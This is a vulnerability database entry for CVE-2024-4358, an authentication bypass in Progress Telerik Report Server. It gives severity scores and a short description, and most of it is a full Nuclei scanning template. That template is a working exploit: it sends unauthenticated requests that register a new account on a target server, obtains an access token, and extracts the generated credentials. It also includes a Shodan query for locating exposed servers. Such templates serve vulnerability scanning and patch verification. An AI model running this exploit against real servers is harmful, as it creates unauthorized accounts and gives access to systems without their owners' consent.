Progress Telerik Report Server - Authentication Bypass

2024-06-0310:40:34

ProjectDiscovery

github.com

cve

telerik

progress

authentication

bypass

iis

vuln

unauthenticated

attacker

access

update

9.9 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.938 High

EPSS

Percentile

99.2%

JSON

In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.

id: CVE-2024-4358

info:
  name: Progress Telerik Report Server - Authentication Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
  impact: An unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
  remediation: Updating to Report Server 2024 Q2 (10.1.24.514) or later.
  reference:
    - https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/
    - https://github.com/sinsinology/CVE-2024-4358
    - https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358
  metadata:
    verified: true
    max-request: 2
    shodan-query: title:"Log in | Telerik Report Server"
  tags: cve,cve2024,telerik,progress,auth-bypass,instrusive
variables:
  user: "{{rand_base(6)}}"
  pass: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /Startup/Register HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        Username={{user}}&Password={{pass}}&ConfirmPassword={{pass}}&Email={{email}}&FirstName={{firstname}}&LastName={{lastname}}

      - |
        POST /Token HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        grant_type=password&username={{user}}&password={{pass}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type_2, "application/json")'
          - 'contains_all(body_2, "access_token", "userName", "token_type")'
          - 'status_code_2 == 200'
        condition: and

    extractors:
      - type: regex
        name: token
        part: body_2
        group: 1
        regex:
          - '"access_token":"([A-Z0-9a-z_-]+)"'
        internal: true

      - type: dsl
        dsl:
          - '"Username: "+ user'
          - '"Password: "+ pass'
# digest: 4b0a00483046022100b40c2678a88f956f4c6349fda05d4d83541374a2907b8731a90941505551b493022100f53a3591f5bd4a3fb03698db001d452302dd2217004277971fc01d9af5e9569f:922c64590222798bb761d5b6d8e72950